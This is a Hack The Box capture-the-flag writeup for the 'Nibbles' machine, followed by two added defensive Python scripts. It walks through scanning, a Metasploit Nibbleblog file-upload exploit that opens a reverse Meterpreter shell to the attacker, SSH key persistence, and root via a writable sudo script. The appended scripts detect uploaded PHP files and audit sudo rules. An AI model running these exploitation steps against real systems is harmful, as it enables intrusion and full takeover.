Welcome to the Nibbles writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Nibbles
tags: HTB, Easy, Linux, OSCP
Platform: Hackthebox
Difficulty: Easy
OS: Linux
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-14 18:37 CET
Nmap scan report for 10.10.10.75
Host is up (0.094s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 37.53 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 22,80 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-14 18:38 CET
Nmap scan report for 10.10.10.75
Host is up (0.094s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 93.73 ms 10.10.14.1
2 93.67 ms 10.10.10.75
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.32 seconds
As we can see, there is a web server on port 80 and an SSH server on the default port 22.
Let's explore the website.
Accessing the website, we can only read Hello world!, but looking at the page source we find a reference to a nibbleblog directory.
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->
Nibbleblog
At this URL we find a blog running Nibbleblog, as the footer text Powered by Nibbleblog shows.
Using searchsploit we can find two available exploits.
# searchsploit nibbleblog
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
The File Upload vulnerability needs an account. After much searching around the server without success, I tried various passwords for the admin user and managed to log in with the box name, nibbles, as the password. I did not like this point... it is not realistic at all.
Exploitation
It's time to use the File Upload vulnerability with Metasploit.
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
RHOSTS => 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
TARGETURI => /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf6 exploit(multi/http/nibbleblog_file_upload) > run
[*] Started reverse TCP handler on 10.10.14.9:4444
[*] Sending stage (39282 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.10.10.75:53234) at 2021-03-14 20:54:10 +0100
[+] Deleted image.php
meterpreter > shell
Process 1649 created.
Channel 0 created.
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
python3 -c "import pty; pty.spawn('/bin/bash')"
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$
And now, in the nibbler home, we can get the user.txt flag.
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
CENSORED_FLAG
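From the defender's side, the module above abused the my_image plugin to drop image.php under content/private/plugins/my_image/ (the directory the shell landed in). As an added example, not part of the original writeup, the following script checks a Nibbleblog plugins directory for anything that is not a plain image: a PHP extension, PHP open tags inside the file, or an image extension whose content lacks image magic bytes. The directory tree and sample files in demo() are constructed.

```python
import os
import re
import tempfile

PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")

def classify(path):
    """Reasons a file in an image-upload directory looks like server-side code."""
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as f:
        head = f.read(4096)
    if ext in PHP_EXTENSIONS:
        reasons.append("php extension")
    if PHP_TAG.search(head):
        reasons.append("php open tag in content")
    if ext in IMAGE_EXTENSIONS and not head.startswith(IMAGE_MAGIC):
        reasons.append("image extension but no image magic bytes")
    return reasons

def scan_plugin_dir(root):
    """Map relative path -> reasons for every suspicious file under root."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = classify(path)
            if reasons:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return findings

def demo():
    """Constructed tree: a real image, a dropped image.php, and PHP behind a .jpg name."""
    root = tempfile.mkdtemp()
    plugins = os.path.join(root, "content", "private", "plugins")
    my_image = os.path.join(plugins, "my_image")
    os.makedirs(my_image)
    samples = {
        "image.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "image.php": b"<?php echo 'constructed marker'; ?>",
        "photo.jpg": b"<?php echo 'constructed marker'; ?>",
    }
    for name, content in samples.items():
        with open(os.path.join(my_image, name), "wb") as f:
            f.write(content)
    return scan_plugin_dir(plugins)
```

Run it against the real /var/www/html/nibbleblog/content/private/plugins path on the box to see what the module left behind; a second, independent control is to deny PHP execution in that directory at the web server.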
Post exploitation
Let's upgrade to a proper SSH session by adding our public key to authorized_keys.
nibbler@Nibbles:/home/nibbler$ mkdir .ssh
nibbler@Nibbles:/home/nibbler$ cd .ssh/
nibbler@Nibbles:/home/nibbler/.ssh$ echo "KZwNCA7nI0th*****************5E1wl2EByci0=" > authorized_keys
nibbler@Nibbles:/home/nibbler/.ssh$
Enumeration
Sudo
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
It seems we can run the monitor.sh script as root without a password. The path is under nibbler's own home directory and does not exist yet, so we control its contents.
Privilege escalation
nibbler@Nibbles:~$ mkdir -p personal/stuff
nibbler@Nibbles:~$ cd personal/stuff/
nibbler@Nibbles:~/personal/stuff$ echo "/bin/bash -i" > monitor.sh
nibbler@Nibbles:~/personal/stuff$ chmod +x monitor.sh
nibbler@Nibbles:~/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
root@Nibbles:~/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:~/personal/stuff# cat /root/root.txt
CENSORED_FLAG
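The root cause here is a sudo rule whose command path is owned, or even still missing, under the calling user's home directory. As an added example (not part of the original writeup), the following script audits a rule line in the format printed by sudo -l and reports why the user can control what runs as root; the home directory, uid and script in demo() are constructed, and the writability check is a coarse owner/mode test that ignores ACLs.

```python
import os
import re
import stat
import tempfile

# One rule line as printed by `sudo -l`, e.g. (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
SUDO_L_RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)")

def parse_sudo_l_rule(line):
    m = SUDO_L_RULE.match(line.strip())
    if not m:
        raise ValueError("not a sudo -l rule: %r" % line)
    tags = {t.strip(":") for t in m.group("tags").split()}
    return m.group("runas"), tags, m.group("cmd")

def user_can_write(path, uid):
    st = os.stat(path)  # owner, or group/world write bit (ACLs ignored)
    return st.st_uid == uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_rule(line, home, uid):
    """Return the reasons a rule lets `uid` control what runs as the run-as user."""
    runas, tags, cmd = parse_sudo_l_rule(line)
    findings = []
    if "NOPASSWD" in tags:
        findings.append("runs without a password")
    if os.path.commonpath([home, cmd]) == home:
        findings.append("command lives under the user's home directory")
    if not os.path.exists(cmd):
        parent = os.path.dirname(cmd)
        while not os.path.exists(parent):  # climb to the nearest existing ancestor
            parent = os.path.dirname(parent)
        if user_can_write(parent, uid):
            findings.append("command missing and nearest existing ancestor is writable: user can create it")
    else:
        if user_can_write(cmd, uid):
            findings.append("command file is writable by the user")
        if user_can_write(os.path.dirname(cmd), uid):
            findings.append("command directory is writable by the user: file can be replaced")
    return findings

def demo():
    """Constructed home: the box's rule before and after the script exists."""
    home = tempfile.mkdtemp()
    uid = os.getuid()
    script = os.path.join(home, "personal", "stuff", "monitor.sh")
    rule = "(root) NOPASSWD: " + script
    before = audit_rule(rule, home, uid)
    os.makedirs(os.path.dirname(script))
    with open(script, "w") as f:
        f.write("#!/bin/sh\necho constructed\n")
    return before, audit_rule(rule, home, uid)
```

A rule that passes this audit points at a root-owned script in a root-owned directory; that is the fix for the monitor.sh entry.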
And that's all folks!